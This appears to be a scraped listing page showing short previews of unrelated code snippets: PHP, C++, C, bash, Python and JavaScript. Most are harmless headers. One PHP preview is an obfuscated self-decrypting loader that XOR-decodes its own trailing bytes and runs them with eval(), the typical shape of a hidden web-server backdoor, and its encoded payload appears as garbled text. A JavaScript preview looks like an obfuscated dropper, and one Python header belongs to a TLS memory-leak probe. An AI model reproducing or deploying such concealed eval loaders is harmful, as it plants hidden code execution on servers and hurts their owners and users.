This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Update variable settings. | |
| * Load to your WP root folder. | |
| */ | |
| // Set $to as the email you want to send the test to | |
| $to = "[email protected]"; | |
| // No need to make changes below this line |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <? | |
| $key=58;$str=file(__FILE__);$res=''; for($j=2;$j<count($str);$j++) $res .=$str[$j];$str=str_replace("[phpcode]", "<?", $res);$len=strlen($str);$ev='';for($i=0;$i<$len;$i++)$ev .= chr(ord($str[$i]) ^ $key);eval($ev);exit;?> | |
| 7070707033333YIR_VVJRJL | |
| JH_H_V_[I_XOSV^703333333|H__M[H_VSY_TI_7033333333ø“yyn_[w70YIR_VVë¾êŠêƒêê†êê‡êêŽêŒêëºë½êëºêêMMMê‹ëºê„ë¹êêëº70ê¨ë±ê†ê„êŒêë¸êê‹êë»ê…êêŠë¸ê‡ê„ë»ê€êŠë½êŠë¸ë¶ê…ê„ë»êêêŽê‡ë´ë´êˆêëºë»ê‚ë´ê‡êŠêŽê„ê†êŠë²ê‡êêƒë»ë¸ëºêŠê‡ê‚ë½ê€êê…ëºê„êŽë¹ê€ë¸êŠ 70RNNJ YYN_[WHOH_V_[I_IYIR_VV7070mx RNNJ YYN_[WHO70sykost 7070ê¤ë»ê„ê‹êê‡ê‡ê„ë»ë¸ê‚ 70ë¹ê…ëºêŠêˆêêê‡ê‚êêê„ê€êŠêë¶ê‡ë±ê†ê‚ê‚ë¹êŽêŠêêê‡ê‡ë±ê†ê‚\NJI[WX[ë¾êŠêƒêêŠê†ê‚ê…êŠê…ê€êŠê†ê‚ë»ê„ëºë¸ê‚ëºê„êˆê€êŠ70êêŠê€êŠë½ê‚êˆêŠê‡ê‚êë»ê€êŠë½ê‚êˆêŠê‡ê‚êë¾êŠêƒêê„êˆê‚ê…êŠê…ê„ê€70ê…ëºêêŽêˆê„ëºê‚ë¸êêë¶ê‡ê„ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /// This is a demonstration of a few nice C++11 features: auto, the ':' | |
| /// iterator, initializer lists, std::function, and lambda expressions. In | |
| /// many cases, it's possible to achieve the same effect as I present using | |
| /// even less code, but by being explicit I hope I have made the code and | |
| /// comments easy to follow | |
| #include <functional> | |
| #include <iostream> | |
| #include <map> | |
| #include <string> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdlib.h> | |
| #include <stdio.h> | |
| #include <math.h> | |
| #include <memory.h> | |
| #ifdef __MINGW32__ | |
| #include <windows.h> | |
| #else | |
| #include <sys/time.h> | |
| #endif // __MINGW32__ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # $HOME/.bashrc FILE for bash-3.0 (or later) | |
| # | |
| # By Yorick de Wid | |
| # First revision Aug. 2006 | |
| # | |
| # Usage: source $HOME/.bashrc | |
| # If not running interactively, don't do anything | |
| [ -z "$PS1" ] && return |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Modified by Travis Lee | |
| # Last Updated: 4/21/14 | |
| # Version 1.16 | |
| # | |
| # -changed output to display text only instead of hexdump and made it easier to read | |
| # -added option to specify number of times to connect to server (to get more data) | |
| # -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc... | |
| # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # OS VERSION: Ubuntu Server 12.04.x LTS | |
| # ARCH: x32_64 | |
| # QPanel Automated Installation Script | |
| # ============================================= | |
| # | |
| # This program is free software: you can redistribute it and/or modify | |
| # it under the terms of the GNU General Public License as published by |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var id = "5555555E0A0B07241511010A1E054A0A0110"; | |
| function RuBit() { | |
| StableSortEn('bje'); | |
| WrapEx() | |
| }; | |
| function EsJavaUpload() { | |
| StableSortEn('lse)'); | |
| XhtmlLid(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * puts vs printf test | |
| * | |
| */ | |
| #include <stdio.h> | |
| #include <time.h> | |
| #define LOOP 100000 |